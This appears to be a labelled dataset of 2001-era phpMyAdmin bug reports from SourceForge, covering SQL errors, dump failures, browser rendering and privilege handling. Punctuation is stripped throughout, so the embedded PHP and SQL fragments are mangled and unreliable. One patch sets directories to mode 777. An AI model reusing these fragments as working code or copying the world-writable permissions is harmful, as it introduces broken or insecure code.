"24444","6579","Many fields IE 5.5 or IE 6. if you want to select data via the tbl selct.php and you have a big table with many fields you get an error after pressing ok ... guess coz to much data to handle with post method !?
look at attached tbl select.html i got for my table .. so maybe some more error handling for what case!?
tested with phpMyAdmin 2.2.1 rc2 Original URL https sourceforge.net p phpmyadmin bugs 210 https sourceforge.net p phpmyadmin bugs 210 Original author thebelgarion","bug"
"24444","6580","ENCODE ) function.
I would like to encrypt a field in a mysql database using phpmyadmin v 2.2.1.
When I use the ENCODE function during update, or insert I get an error SQL query UPDATE tbl SET field = ENCODE mypassword ) WHERE vendor id = 1 ; MySQL said You have an error in your SQL syntax near ) WHERE vendor id = 1 at line 1 Any thoughts?
Patrick Original URL https sourceforge.net p phpmyadmin bugs 211 https sourceforge.net p phpmyadmin bugs 211 Original author anonymous","bug"
"24444","6581","DUMP ERROR [2.2.1rc2].
following dump problem for php amp;lt; 4.0.5 only is the last field in a record is NULL you will get e.g.
..., 2001 10 05 , NULL,); Solution build dump.lib.php line 317 was schema insert .= NULL, ; change to schema insert .= NULL, ; so just a simple space was missing G Original URL https sourceforge.net p phpmyadmin bugs 212 https sourceforge.net p phpmyadmin bugs 212 Original author thebelgarion","bug"
"24444","6582","Impossible to insert the character quot; quot;.
When I try to insert the character amp;quot; amp;quot; into a string attribute, I havn t got any error but the character is not insered.
Exemple Try to insert the string amp;quot;2 2 amp;quot;.
The result will be amp;quot;2 2 amp;quot;.
Original URL https sourceforge.net p phpmyadmin bugs 213 https sourceforge.net p phpmyadmin bugs 213 Original author anonymous Found in version 2.2.0rc4","bug"
"24444","6583","phpmyadmin ignores socket definition.
The whole thing works properly except for one little issue.... the interface seems to ignore the socket definiton I put in.
but when I try to connect to the server it gives me the old Can t connect to local MySQL server through socket tmp mysql.sock 111) which is not where myql is it is at a different location that I specified in config.inc.php... amp;quot; cfgServers[1][ socket ]= var lib mysql mysql.sock ; amp;quot; why does it do this?
Original URL https sourceforge.net p phpmyadmin bugs 214 https sourceforge.net p phpmyadmin bugs 214 Original author anonymous Found in version 2.2.0","bug"
"24444","6584","Xitami 2.5b4 blank page returned.
All I getting from index.php is a blank page.
I am runnig version 2.20 php version 4.06 Xitami versin 2.5b4 on Nt 4.0 sp6a I ve changed the cfgOBGzip directive to FALSE in config.inc.php and zlib.output compression was already set to off in the php config file.
I also edited lib.inc.php and removed the amp;quot;= amp;quot; on line 109 as mentioned in one of the discussion groups Original URL https sourceforge.net p phpmyadmin bugs 215 https sourceforge.net p phpmyadmin bugs 215 Original author anonymous","bug"
"24444","6585","SELECTing a table if no priv for a column.
If a user only has privileges on certain columns in a table, and NO SELECT privilege to a certain column, the table browsing will fail.
We would need a way to find out what columns the user is allowed to see, and request ONLY those in the SELECT query.
amp;quot;SHOW GRANTS FOR user localhost; amp;quot; would tell us what columns he is allowed to see.
Original URL https sourceforge.net p phpmyadmin bugs 216 https sourceforge.net p phpmyadmin bugs 216 Original author robbat2 Found in version 2.2.0","bug"
"24444","6586","Can t sort quot;Db statistics quot; by column.
[This is about the final release of 2.2.1 which is not yet available in the bug reporting interface] The amp;quot;Databases statistics amp;quot; page s main table has clickable column headers.
Clicking the amp;quot;Database amp;quot; column header sorts the table alphabetically by database name.
Clicking any of the other column headers, however, does not have any effect.
Original URL https sourceforge.net p phpmyadmin bugs 218 https sourceforge.net p phpmyadmin bugs 218 Original author mfichtner Found in version 2.2.1","bug"
"24444","6587","2.2.1) table not found editing user.
user details.php, line 1172 SHOULD BE UPDATE user SET Should be Lower case user , Mysql doens t like table fielddnames that aren t the right case.
WAS UPDATE User SET uppercase U in user) Alister Original URL https sourceforge.net p phpmyadmin bugs 217 https sourceforge.net p phpmyadmin bugs 217 Original author alister Found in version 2.2.1","bug"
"24444","6588","can not see the PROCESSLIST.
In 2.2.1rc2 I could see the PROCESSLIST but I can not in 2.2.1 I have not changed anything?!
Original URL https sourceforge.net p phpmyadmin bugs 219 https sourceforge.net p phpmyadmin bugs 219 Original author spinaker Found in version 2.2.1","bug"
"24444","6589","wrong data by using a table twice.
Hello, Wrong data is display when running a select twice against one table I have got one table of articles and one of amp;quot;is part of amp;quot; tables which describes connections between different tables articles pnr name product no name) ========= 1 A 2 B 3 C stueckliste parts) part pnr ================== 3 1 3 2 SELECT stueckliste.part, uart.pnr, uart.name, st ckliste.pnr, artbest.pnr, artbest.name FROM stueckliste articles uart, articles articles WHERE stueckliste.part = uart.pnr AND stueckliste.pnr = articles.pnr The select shold display part pnr name pnr pnr name ========================== 3 3 C 1 1 A 3 3 C 2 2 B but it displays 3 1 A 1 1 A 3 2 B 2 2 B If I run same query against command line tool of mysql the upper table appears as recommended.
Greetings, Andrxc3xa9 Original URL https sourceforge.net p phpmyadmin bugs 220 https sourceforge.net p phpmyadmin bugs 220 Original author anonymous Found in version 2.2.1","bug"
"24444","6590","Query fails for DISTINCT CONCAT.
This query fails miserably SELECT DISTINCT CONCAT uri stem,uri query) FROM `stats log db` with Error SQL query [Edit] SHOW FIELDS FROM `iw11`.` sql4cc 49 0` LIKE CONCAT uri stem,uri query) MySQL said Table iw11.
sql4cc 49 0 doesn t exist the query actually works.. phpMyAdmin just can t find the fields for that distinct concat.. obscure.
Original URL https sourceforge.net p phpmyadmin bugs 221 https sourceforge.net p phpmyadmin bugs 221 Original author scoates","bug"
"24444","6591","2.2.0) Cannot run textfile queries.
When attempting to run an sql query on the database from a textfile, phpMyAdmin picks up the query from the text area above the Browse... button.
Original URL https sourceforge.net p phpmyadmin bugs 222 https sourceforge.net p phpmyadmin bugs 222 Original author anonymous Found in version 2.2.0","bug"
"24444","6592","only db displays no databases.
When specifying amp;quot; cfgServers[1][ only db ] = db 237201j ; amp;quot; in config.inc.php, phpMyAdmin shows amp;quot;No databases amp;quot; in the left frame.
If I remove db 237201j, thus emptying the only db string, phpMyAdmin correctly shows the db 237201j database.
If I however then copy the URL to one of the tables in db 237201j, and then specify only db once again, I can access the tables and perform modifications on them by pasting the URL, while the left frame still displays amp;quot;No databases amp;quot;.
I only have one server configured with basic authentication.
The MySQL server runs version 3.23.36 on a Linux box, the PHP version is 4.0.6 and runs on SunOS together with the Apache web server.
Original URL https sourceforge.net p phpmyadmin bugs 223 https sourceforge.net p phpmyadmin bugs 223 Original author anonymous Found in version 2.2.1","bug"
"24444","6593","Apache crash when using myAdmin.. My apache crashes when Im using myAdmin to create databases, tables and such...
I can delete, select and browse only ... i can not use insert in myAdmin.
But I can use Insert in .php files that I have created ...
Original URL https sourceforge.net p phpmyadmin bugs 224 https sourceforge.net p phpmyadmin bugs 224 Original author anonymous Found in version 2.2.1","bug"
"24444","6594","2.2.1) amp;quot;only db amp;quot; and db names with amp;quot; amp;quot;.
Hi all!
This bug is already fixed in the cvs but I report it for users.
If one use the amp;quot;only db amp;quot; setting and fill it with database names containing amp;quot; amp;quot; or amp;quot; amp;quot; characters, no database will be displayed in the left frame.
To fix it 1) escape every amp;quot; amp;quot; or amp;quot; amp;quot; characters used inside databases names ie do not use amp;quot;my db amp;quot; but amp;quot;my\ db amp;quot;; 2) replace the amp;quot;libraries common.lib.php3 amp;quot; script from the phpMyAdmin 2.2.1 package by the one joined to this bug report it contains both php amp;amp; php3 extension).
Loxc4x8fc Original URL https sourceforge.net p phpmyadmin bugs 225 https sourceforge.net p phpmyadmin bugs 225 Original author loic1 Found in version 2.2.1","bug"
"24444","6595","View Dump.
View Dump and save as file results in the following amp;lt;br amp;gt; amp;lt;b amp;gt;Warning amp;lt; b amp;gt; Supplied argument is not a valid MySQL result resource in amp;lt;b amp;gt; home aviation missionaviation www phpMyAdmin libraries build dump.lib.php amp;lt; b amp;gt; on line amp;lt;b amp;gt;74 amp;lt; b amp;gt; amp;lt;br amp;gt; amp;lt;b amp;gt;Error amp;lt; b amp;gt; amp;lt;p amp;gt; SQL query amp;amp;nbsp; amp;amp;nbsp; amp;lt;pre amp;gt; SELECT FROM `missionaviation net`.`nuke comments` amp;lt; pre amp;gt; amp;lt; p amp;gt; amp;lt;p amp;gt; MySQL said amp;lt;br amp;gt; amp;lt;pre amp;gt; MySQL server has gone away amp;lt; pre amp;gt; amp;lt; p amp;gt; amp;lt;a href= amp;quot;tbl properties.php?
lang=en amp;amp;amp;server=1 amp;amp;amp;db=missionaviation net amp;quot; amp;gt;Back amp;lt; a amp;gt; amp;lt; body amp;gt; amp;lt; html amp;gt; Original URL https sourceforge.net p phpmyadmin bugs 226 https sourceforge.net p phpmyadmin bugs 226 Original author anonymous","bug"
"24444","6596","2.2.1) Loss of SQL statement in case of error.
When I mistyped an SQL statement I get an error message and if I go back the statement is gone and I have to retype it.
As far as I remember it worked in 2.2.0 where you could alter the statement instead of just going back.
Original URL https sourceforge.net p phpmyadmin bugs 227 https sourceforge.net p phpmyadmin bugs 227 Original author rod1603 Found in version 2.2.1","bug"
"24444","6597","TEXT causes IE to choke.
Using IE 6.0.2600.0000 Netscape and Mozilla are fine), can t edit TEXT fields since query string is so large.
In one case, the Edit link was 7500 characters and would not display as a link.
This is really large for a URL and is causing some browsers to choke.
See attached file for sample link.
Original URL https sourceforge.net p phpmyadmin bugs 228 https sourceforge.net p phpmyadmin bugs 228 Original author anonymous Found in version 2.2.1","bug"
"24444","6598","2.2.1) HTML mispelling lt; td gt; instead of lt; th gt;).
I ve seen two HTML mispelling.
Here there are db details.php around line 303) ============== amp;lt;th align= amp;quot;center amp;quot; amp;gt; amp;lt;b amp;gt; amp;lt; b amp;gt; amp;lt; td amp;gt; | should be amp;lt;th align= amp;quot;center amp;quot; amp;gt; amp;lt;b amp;gt; amp;lt; b amp;gt; amp;lt; th amp;gt; | to correctly close the amp;lt;th amp;gt; tag.
db printview.php around line 205) ================ amp;lt;th align= amp;quot;center amp;quot; amp;gt; amp;lt;b amp;gt; amp;lt; b amp;gt; amp;lt; td amp;gt; | should be amp;lt;th align= amp;quot;center amp;quot; amp;gt; amp;lt;b amp;gt; amp;lt; b amp;gt; amp;lt; th amp;gt; | to correctly close the amp;lt;th amp;gt; tag.
Original URL https sourceforge.net p phpmyadmin bugs 229 https sourceforge.net p phpmyadmin bugs 229 Original author tititou Found in version 2.2.1","bug"
"24444","6599","Import Excel CVS Files with NS6.2 6.1.
I always get only the default values as entry in my db by importing an excel cvs file with Netscape 6.2 and 6.1.
The Import will be done without any error messages, but while looking in my db table i can see that the import went wrong.
it also hanks after the first 16 of 64 inserts.
but i got no message!
with 2.2.0 it is al working fine.
Original URL https sourceforge.net p phpmyadmin bugs 230 https sourceforge.net p phpmyadmin bugs 230 Original author bkoester Found in version 2.2.1","bug"
"24444","6600","2.2.1) Drop a Table amp;gt; wrong server at left frame.
I use phpMyAdmin with support for 5 different Database Servers.
If i change e.g to server 2, select a database and emtpy a table, the left navigation from server 2 will always be replaced with the navigation of server 1. in the right frame there ist still the selected database table from server 2 activated.
Original URL https sourceforge.net p phpmyadmin bugs 231 https sourceforge.net p phpmyadmin bugs 231 Original author bkoester Found in version 2.2.1","bug"
"24444","6601","No Tables with 2.2.1.
Have been using 2.2.1 rc1, just updated to 2.2.1.
Works fine for local databases, but always returns amp;quot;No Tables amp;quot; in left side frame navigation for remote MySQL 3.23.33) database running Solaris.
Config file is basically identical to rc1 version.
Had to revert to rc1.
Any ideas?
Original URL https sourceforge.net p phpmyadmin bugs 232 https sourceforge.net p phpmyadmin bugs 232 Original author bcolflesh Found in version 2.2.1","bug"
"24444","6602","security hole phpinfo.php.
Hi!
We ve just discovered that phpmyadmin installs phpinfo.php, which if not protected by .htaccess makes system information visible for all.
I guess it should be also password protected.
Original URL https sourceforge.net p phpmyadmin bugs 233 https sourceforge.net p phpmyadmin bugs 233 Original author anonymous","bug"
"24444","6603","Wrong when upload a database have quot;.
When I upload a Database with amp;quot; in recode.
phpMyAdmin give a error for SQL.
Original URL https sourceforge.net p phpmyadmin bugs 234 https sourceforge.net p phpmyadmin bugs 234 Original author cg0503","bug"
"24444","6604","select ... into outfile fails.
Query like SELECT FROM tablename INTO OUTFILE tmp something.txt generates a bunch of errormessages and fails Warning Supplied argument is not a valid MySQL result resource in home httpd html phpMyAdmin sql.php on line 95 Warning Cannot add header information headers already sent by output started at home httpd html phpMyAdmin sql.php 95) in home httpd html phpMyAdmin ob lib.inc.php on line 31 and so on.
The problem seems to be a LIMIT keyword, that s automatically added to query sql.php, rows 79 82 sql limit = isset pos) amp;amp; amp;amp; eregi amp;quot; SELECT amp;quot;, sql query) amp;amp; amp;amp; !eregi amp;quot;LIMIT[ 0 9,] amp;quot;, sql query)) ?
amp;quot; LIMIT pos, cfgMaxRows amp;quot; ; mysql select db db); result = mysql query sql query.
sql order.
sql limit); Original URL https sourceforge.net p phpmyadmin bugs 235 https sourceforge.net p phpmyadmin bugs 235 Original author martxl Found in version old","bug"
"24444","6605","login string not set.
in the language file english ist the login String amp;quot; strLogin amp;quot; set to an empty value.
The comment says, that it is not used.
This is not true, as the content of this string is used to label the button aon the login page.
Original URL https sourceforge.net p phpmyadmin bugs 236 https sourceforge.net p phpmyadmin bugs 236 Original author anonymous","bug"
"24444","6606","2.2.1) Unable to insert dumps from phpmyadmin.
Okay, so I make dumps from database on my WinME machine which I develop on.
The dumps are from phpMyadmin, and when tried to put into my phpMyAdmin running on my server RedHat Linux) its will NOT insert the dumps.
Just gives me query empty errors.
Original URL https sourceforge.net p phpmyadmin bugs 237 https sourceforge.net p phpmyadmin bugs 237 Original author anonymous Found in version 2.2.1","bug"
"24444","6607","2.2.1) interface fonts too big on macs.
In the file amp;quot;phpMyAdmin libraries common.lib.php amp;quot;, there is some checking for browser type, which then determines the font size variable.
For Macs, it used to be that you needed to set this higher bigger than Windows.
With IE 5 and Netscape 6 , this is no longer the case.
This is a minor issue, but the fonts are frickin huge.
Easy to change, however.
BTW, same issue with this bug tracking system.
Original URL https sourceforge.net p phpmyadmin bugs 238 https sourceforge.net p phpmyadmin bugs 238 Original author anonymous Found in version 2.2.1","bug"
"24444","6608","data dumping is broken in cvs version.
Dumping of data is broken in current cvs version.
It outputs empty values as following listing INSERT INTO test VALUES , , , , ); INSERT INTO test VALUES , , , , ); INSERT INTO test VALUES , , , , ); INSERT INTO test VALUES , , , , ); INSERT INTO test VALUES , , , , ); INSERT INTO test VALUES , , , , ); INSERT INTO test VALUES , , , , ); INSERT INTO test VALUES , , , , ); This is not related only to SQL dumps, but also to CSV dupms.
Most probable reason is that in libraries build dump.lib.php3 is used undefined variable test.
Does anybody know why it is there?
When I add test= 0 to start of each function where test occurs, it works ok.
Original URL https sourceforge.net p phpmyadmin bugs 239 https sourceforge.net p phpmyadmin bugs 239 Original author nijel","bug"
"24444","6609","2.2.2 rc1) show full processlist should have kill .
show processlist has kill links beside all of the processes.
show full processlist doesn t have this feature, even though its basically the same functionaltiy with a loger query description Original URL https sourceforge.net p phpmyadmin bugs 240 https sourceforge.net p phpmyadmin bugs 240 Original author anonymous Found in version 2.2.0","bug"
"24444","6610","Apache crash.
Apache crash when I want t destroy some table by checking box.
Original URL https sourceforge.net p phpmyadmin bugs 241 https sourceforge.net p phpmyadmin bugs 241 Original author anonymous","bug"
"24444","6611","2.2.2) left frame strange behaviour with Windows XP.
When the left frame opens from localhost on Windows XP with IE 6.0 and Apache 1.3.22) it takes like 15 30 seconds, and during this time in thes status bar there are 3 messages rotating Website Found.
Waiting for reply... , Start downloading... , Opening page... ...
This never happened in 2.2.0...
The same tried with Netscape 6.2 loads in a moment...
Original URL https sourceforge.net p phpmyadmin bugs 242 https sourceforge.net p phpmyadmin bugs 242 Original author anonymous Found in version 2.2.2 rc1","bug"
"24444","6612","left.php menu.
when i open my phpMyAmin the left menu opens for about a second then bugs out and displays a page that cant be viewed now im not shure why this is happening but i have a few ideas cause it has happened recently when i upgraded to win XP i am also useing phpdev to run phpMyAdmin on my localhost .
otherwise i love useing this tool but cant with out this menu is there a php time out or something i can give it more time to load this page or .... i need help!
Original URL https sourceforge.net p phpmyadmin bugs 243 https sourceforge.net p phpmyadmin bugs 243 Original author anonymous Found in version 2.2.2 rc1","bug"
"24444","6613","Users Page amp;quot;no password amp;quot;.
in user details.php, line 897 amp;lt;?php echo row[ Password ]) ?
GLOBALS [ strYes ] amp;lt;span style= amp;quot;color FF0000 amp;quot; amp;gt; .
GLOBALS [ strNo ] .
amp;lt; span amp;gt; ) .
amp;quot;\n amp;quot;; ?
amp;gt; row[ Password ]) should also allow for a field name with a lowercase P In my version, Mysql 3.23.23 beta, the mysql user table s password column is not capitalized Ryan McCleary Original URL https sourceforge.net p phpmyadmin bugs 244 https sourceforge.net p phpmyadmin bugs 244 Original author anonymous Found in version 2.2.2 rc1","bug"
"24444","6614","can t change hostname for a user.
If you try to change the hostname of a user, you get an error that says SQL query UPDATE User SET host = localhost WHERE Host = AND User = dummy MySQL said Table mysql.User doesn t exist This is likely because the table names are case sensitive and phpMyAdmin is trying to update the User table instead of the user table.
Original URL https sourceforge.net p phpmyadmin bugs 245 https sourceforge.net p phpmyadmin bugs 245 Original author undertow3886 Found in version 2.2.1","bug"
"24444","6615","2.2.2 cvs) No logout option for users.... With latest CVS whereby the column amp;quot;MySQL amp;quot; does not appear if there are no functions to display, a normal MySQL user using Advanced Authentication that does not have any options set in the MySQL column does not have a amp;quot;logout amp;quot; option anymore.
The code does not add a Logout link to the main screen if all the display variables cfgShowMysqlInfo, cfgShowMysqlVars, cfgShowPhpInfo) are set to false.
Original URL https sourceforge.net p phpmyadmin bugs 246 https sourceforge.net p phpmyadmin bugs 246 Original author anonymous Found in version 2.2.2 rc1","bug"
"24444","6616","index on text blob.
If you click index or unique on a text blob column, you receive error BLOB column comments used in key specification without a key length Original URL https sourceforge.net p phpmyadmin bugs 247 https sourceforge.net p phpmyadmin bugs 247 Original author anonymous Found in version 2.2.2 rc1","bug"
"24444","6617","Text fields don t display newlines.
FreeBSD 4.4, apache 1.3.22, mod php4 4.0.6, mysql 3.23.45, phpmyadmin 2.2.2rc1 If you have a table with a text field containing repeated \r\n characters phpmyadmin doesn t display the blank lines formed by each pair of \r\n.
Inspecting the field contents with the mysql commandline tool shows the blank lines correctly.
Sequences like abc\r\n\r\ndef are displayed as abc def instead of being displayed abc def Regards, Neil Darlow M.Sc.
Original URL https sourceforge.net p phpmyadmin bugs 248 https sourceforge.net p phpmyadmin bugs 248 Original author anonymous","bug"
"24444","6618","phpMyAdmin 2.2.2 rc1 revoke reference .
phpMyAdmin 2.2.2 rc1 user admin area, adv auth the pivileges are shown in english.
However, there is a typo REFERENCES is displayed as REFERENCES.
This matters when you try to revoke pivileges from a user with the REFERENCES priv through phpmyadmin.
MySQL just gives an error about it.
However, it was a bit difficult to find the cause.
Thanks for your great dev ing work!
Original URL https sourceforge.net p phpmyadmin bugs 249 https sourceforge.net p phpmyadmin bugs 249 Original author anonymous","bug"
"24444","6619","2.2.2) only db problem with the 2.2.x.
When assign only db value in config.inc.php.
It s not show any databases left frame of phpmyadmin.
because of result of query In the file common.lib.php show databases like ???
It isn t constant field name that you can t call row [ database ] directly.
Now i using row[0] because your query doesn t have anymore fields or you have anyidea to change it .
Please fix this little bug. )
Original URL https sourceforge.net p phpmyadmin bugs 250 https sourceforge.net p phpmyadmin bugs 250 Original author santa satan Found in version 2.2.2","bug"
"24444","6620","2.2.2 doc) Dump and Konqueror.
I don t know if this is a bug or just needs a FAQ entry.
If you dump a database schema under Konqueror, the resulting file is placed in your .kde tmp hostname directory named as konqerorXXXXX.php or similar.
You have to go looking for this file and copy it otherwise, when the browser is closed, the file is deleted.
Is there some additional configuration required to enable Konqueror to handle schema files produced by phpMyAdmin in the various output formats?
Regards, Neil Darlow M.Sc.
Original URL https sourceforge.net p phpmyadmin bugs 251 https sourceforge.net p phpmyadmin bugs 251 Original author anonymous","bug"
"24444","6621","2.2.3) Cannot upload if open basedir set.
Cannot upload file if open basedir is set !!
This patch solve it, but must create directory temp tmp and change perm to 777 temp and 777 temp tmp this patch canot remove uploaded file !!
read dump.php.orig Tue Dec 4 16 10 27 2001 read dump.php Tue Dec 4 16 17 13 2001 191,6 191,8 Gets the query from a file if required if sql file != none ) \{ if file exists sql file)) \{ sql query = fread fopen sql file, r ), filesize sql file)); \ if is uploaded file sql file) ) \{ \ new sql file= amp;quot;temp amp;quot; .
sql file; \ move uploaded file sql file, new sql file); \ sql query = fread fopen new sql file, r ), filesize new sql file)); if get magic quotes runtime ) == 1) \{ sql query = stripslashes sql query); Original URL https sourceforge.net p phpmyadmin bugs 252 https sourceforge.net p phpmyadmin bugs 252 Original author anonymous Found in version 2.2.1","bug"
"24444","6622","2.2.2) Missing text in Polish translation.
When you enter any database, you see database dump options at bottom.
There is also amp;quot;Extended inserts amp;quot; checkbox option.
In Polish translation text is missing, there should be amp;quot;Rozszerzone dodania amp;quot; sentence.
Original URL https sourceforge.net p phpmyadmin bugs 253 https sourceforge.net p phpmyadmin bugs 253 Original author tomash Found in version 2.2.1","bug"
"24444","6623","2.2.2) tbl select doesn t work properly.
when you search by field of type string char) it dosn t work !!
the reason is it doesn t set quot to \ because types[ i] returns something like char 16) for example, but it looks for string Original URL https sourceforge.net p phpmyadmin bugs 254 https sourceforge.net p phpmyadmin bugs 254 Original author cecot Found in version 2.2.2","bug"
"24444","6624","Opera 6.0.
When I open phpMyAdmin an Opera 6 Browser In left menu I don t see table name, only database.
Original URL https sourceforge.net p phpmyadmin bugs 255 https sourceforge.net p phpmyadmin bugs 255 Original author anonymous Found in version 2.2.2","bug"
"24444","6625","can t display databases containing .
It seems that pma is not able to display databases choosen via cfgServers which name contains a , f.e.
nuke local.
have tried several databases with and without and only the databases with are not visible in both, left and main area Original URL https sourceforge.net p phpmyadmin bugs 256 https sourceforge.net p phpmyadmin bugs 256 Original author cabby Found in version 2.2.2","bug"
"24444","6626","enum fields in tbl properties.php.
An enum field that was defined as enum , no , yes ) will be displayed as enum \ , no , yes ) in tbl properties.php and tbl alter.php note the backslash that is displayed instead of the first single quote).
tbl dump.php displays the same field s definition correctly.
Original URL https sourceforge.net p phpmyadmin bugs 257 https sourceforge.net p phpmyadmin bugs 257 Original author mfichtner Found in version 2.2.2","bug"
"24444","6627","File name too long in tbl replace.php.
Warning stat failed for .
sql.php?lang=fr amp;amp;server=1 amp;amp;db=www skiset amp;amp;table=users mag amp;amp;pos=0 amp;amp;sessionMaxRow= amp;amp;dontlimitchars= amp;amp;sql query=SELECT 2A FROM 60users mag 60 WHERE user id in 28 2738d803a391ea6ca8 27 2C 2738d803a391ea6ca9 27 2C 2738d803a391ea6caa 27 2C 2738d803a391ea6cab 27 2C 0D 0A 2738d803a391ea6cac 27 2C 2738d803a391ea6cad 27 2C 0D 0A 2738d803a391ea6cae 27 29 amp;amp;zero rows=L 27enregistrement a E9t E9 effac E9 amp;amp;goto=tbl properties.php errno=36 File name too long) in web phpMyAdmin tbl replace.php on line 225 Warning Cannot add header information headers already sent by output started at web phpMyAdmin tbl replace.php 225) in web phpMyAdmin tbl replace.php on line 234 Original URL https sourceforge.net p phpmyadmin bugs 258 https sourceforge.net p phpmyadmin bugs 258 Original author anonymous Found in version 2.2.2","bug"
"24444","6628","no access to mysql db = serious problem.
If you have no access whatsoever to the mysql database literally, the admin database ), you simply get a No databases ..
Original URL https sourceforge.net p phpmyadmin bugs 259 https sourceforge.net p phpmyadmin bugs 259 Original author anonymous Found in version 2.2.2","bug"
"24444","6629","sorting rox.
link to sort a colone is not complete in cvs and in the last release lib display tbl.php line 518 .
amp;amp;amp;dontlimitchars .
dontlimitchars \ .
amp;amp;amp;dontlimitchars= .
dontlimitchars) ?
1 0) Original URL https sourceforge.net p phpmyadmin bugs 260 https sourceforge.net p phpmyadmin bugs 260 Original author anonymous","bug"
"24444","6630","SQL Upload error last comment comment.
Example Database helpdesk running on localhost Error SQL query MySQL said Query was empty Back The problem occurs when a SQL file is uploaded with a comment on the last line, and no ending newline.
The hack fix is for read dump.php function PMA splitSqlFile amp;amp; ret, sql, release) \{ sql = trim sql); A hack to ensure a final newline sql = trim sql).
amp;quot;\n amp;quot;; sql len = strlen sql); ... Also another fix to read dump.php which I have made is message = amp;quot; strSuccess amp;amp;nbsp; amp;lt;br amp;gt; strTheContent pieces count strInstructions) amp;amp;nbsp; amp;quot;; Originally amp;quot; strSuccess amp;amp;nbsp; was amp;quot; strSuccess amp;amp;nbsp Cheers Jason Original URL https sourceforge.net p phpmyadmin bugs 261 https sourceforge.net p phpmyadmin bugs 261 Original author jasonpell Found in version 2.2.2","bug"
"24444","6631","Update NULL to NOT NULL error.
Hello, This is may be not a bug but a nice to have change , it s up to you.
I created a new field with the Null information set to NULL yes), so it set Default to NULL.
I now want to update it to NOT NULL but a I have following error message SQL query ALTER TABLE mysql.test CHANGE name name CHAR 20) DEFAULT NULL NOT NULL MySQL said Invalid default value for name because Default had NULL and not nothing.
I hope this is clear.
Original URL https sourceforge.net p phpmyadmin bugs 262 https sourceforge.net p phpmyadmin bugs 262 Original author oursel Found in version 2.2.2","bug"
"24444","6632","When field type when copying table.
I have a table with four fields in it.
However, when I try to copy the table to a new table I get the error message BLOB column infotext can t have a default value Which is correct, coming from MySQL, but my field was originally of type TEXT.
Here s the query that phpMyAdmin tries to run CREATE TABLE `inservice`.`com settings` id tinyint 4) not null default 0 , contact varchar 30) not null default , emailcontact varchar 50) not null default , infotext text not null default varchar 30) , primary key id), key id id), unique key id 2 id)) type=MyISAM I have no idea where it gets that amp;quot;default varchar 30) amp;quot; from for the infotext field.
Is it a bug, or just me?
Original URL https sourceforge.net p phpmyadmin bugs 263 https sourceforge.net p phpmyadmin bugs 263 Original author anonymous","bug"
"24444","6633","2.2.2) References to manual.
Some references to the MySQL manual have changed, for example the one next to amp;quot;Users.
Original URL https sourceforge.net p phpmyadmin bugs 264 https sourceforge.net p phpmyadmin bugs 264 Original author lem9","bug"
"24444","6634","Problems with PHP 4.1.0.
I recently upgraded to PHP v4.1.0 and I get errors at the bottom of both frames on all pages reading Warning Unknown persistent list entry type in module shutdown 11) in Unknown on line 0 Warning Unknown persistent list entry type in module shutdown 11) in Unknown on line 0 The only way I can make this go away is by downgrading to PHP version 4.0.6.
Original URL https sourceforge.net p phpmyadmin bugs 265 https sourceforge.net p phpmyadmin bugs 265 Original author anonymous Found in version 2.2.2","bug"
"24444","6635","Cache headers not working with IE 5.5SP2.
IE 5.5 SP2; Q312461 doesn t use the cache control headers properly.
By modifying them all within RFC2616 spec), it works.
Within header.inc.php, replace the amp;quot;Sends http headers amp;quot; section with this Sends http headers Don t use cache required for Opera) now = gmdate D, d M Y H i s ) .
GMT ; instead of expiring now, just put 0 old = 0 ; rfc2616 Section 14.21 header Expires .
old); header Date .
now); header Last Modified .
now); header Cache Control no store, no cache, must revalidate ); HTTP 1.1 header Cache Control pre check=0, post check=0, max age=0 ); HTTP 1.1 header Pragma no cache ); HTTP 1.0 Define the charset to be used header Content Type text html; charset= .
charset); Original URL https sourceforge.net p phpmyadmin bugs 266 https sourceforge.net p phpmyadmin bugs 266 Original author anonymous Found in version 2.2.2","bug"
"24444","6636","No Sql Query!
2 MB).
Hi I ve just installed 2.2.1 on a win2k box running apache.
I ve got mysql 3.23.46 installed and everything is fine.
However if i try and copy a tables structure and data from v2.2.1 which is on a linux box it keeps coming up with amp;quot;No Sql Query amp;quot;!!
However if i manually type an sql query in its fine!
What is the problem?
Cheers GMailer Original URL https sourceforge.net p phpmyadmin bugs 267 https sourceforge.net p phpmyadmin bugs 267 Original author garymailer","bug"
"24444","6637","phpMyAdmin 2.2.2 Print view bug.
I tested it on a win2k machine and a redhat machine with MySQL 3.23.46 nt and MySQL 3.23.32.
Error SQL query SHOW OPEN TABLES FROM `ems` MySQL said Query was empty Back Please see this as not send, if you allready are aware of this error.
Original URL https sourceforge.net p phpmyadmin bugs 268 https sourceforge.net p phpmyadmin bugs 268 Original author anonymous","bug"
"24444","6638","2.2.2) Problem when sorting table.
When trying to sort a table in browse mode) http localhost phpMyAdmin sql.php?lang=en amp;amp;server=1 amp;amp;db=newsparser amp;amp;table= news source amp;amp;pos=0 amp;amp;session max rows=50 amp;amp;dontlimitchars amp;amp;sql query=SELECT 2A FROM 60 news source 60 ORDER BY 60format fichier 60 ASC I had the following bug === amp;gt; Warning Undefined variable sql query in web phpMyAdmin sql.php on line 36 Warning Undefined variable sql query in web phpMyAdmin sql.php on line 116 Warning Cannot add header information headers already sent by output started at web phpMyAdmin sql.php 36) in web phpMyAdmin libraries ob.lib.php on line 53 Warning Cannot add header information headers already sent by output started at web phpMyAdmin sql.php 36) in web phpMyAdmin header.inc.php on line 23 Warning Cannot add header information headers already sent by output started at web phpMyAdmin sql.php 36) in web phpMyAdmin header.inc.php on line 24 Warning Cannot add header information headers already sent by output started at web phpMyAdmin sql.php 36) in web phpMyAdmin header.inc.php on line 25 Warning Cannot add header information headers already sent by output started at web phpMyAdmin sql.php 36) in web phpMyAdmin header.inc.php on line 26 Warning Cannot add header information headers already sent by output started at web phpMyAdmin sql.php 36) in web phpMyAdmin header.inc.php on line 27 Warning Cannot add header information headers already sent by output started at web phpMyAdmin sql.php 36) in web phpMyAdmin header.inc.php on line 29 Error MySQL said Query was empty Original URL https sourceforge.net p phpmyadmin bugs 269 https sourceforge.net p phpmyadmin bugs 269 Original author anonymous","bug"
"24444","6639","FULLTEXT feature with WHERE clause.
My System WAMP) Windows 98 SE IE 6.0 5.5sp1) Apache 1.3.20 MySQL 3.23.32 PHP 4.1 phpMyAdmin 2.2.3 dev 2001 12 18) If I want to use the FULLTEXT function by pressing the button image) I get a MySQL error because of the SQL Syntax.
The error is the slashed version of the where clause.
The WHERE object= amp;quot;xyz amp;quot; will get WHERE object=\ amp;quot;xyz\ amp;quot; and so on ...
If I delete the 5C from the GET URL it works, so the image button produced an wrong command.
I hope you can fix it.
